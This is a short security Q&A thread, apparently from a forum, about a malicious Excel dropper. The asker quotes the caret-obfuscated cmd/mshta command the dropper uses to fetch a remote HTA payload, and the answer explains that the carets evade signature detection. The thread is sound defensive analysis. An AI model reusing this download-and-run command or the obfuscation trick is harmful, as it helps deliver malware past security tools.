Malware dropper uses "^" character in syntax of cmd.exe before calling mshta.exe to download file?

Question

I found a malicious Excel file that was using an embedded HTA program as its dropper to download a powershell program from a malicious IP. The dropper was on a hidden sheet in the file. After reviewing the output in the sandbox I found that the syntax in the command line made use of the ^ character. Why?

C:\Windows\SYSTEM32\cmd.exe
cmd /c m^sh^t^a h^tt^p^:/^/8x.xxx.xx.xxx/pp/aa.html

Then the following command was :

mshta  hxxp://8x.xxx.xx.xxx/pp/aa.html

So, it was using HTA to call mshta.exe but why that syntax in the commandline? Is that valid, a sandbox error, or an attempt to get around security monitoring tools/antivirus software?

score 2 · Answer 1 · answered Jan 14 '22 at 20:11

That is likely an attempt to evade security software and/or signature based detection. The caret character (^) is used as an escape character in batch scripts/cmd. When used before a normal character, it is effectively just ignored. This is a common obfuscation technique used by windows malware.

Malware dropper uses "^" character in syntax of cmd.exe before calling mshta.exe to download file?

1 Answers1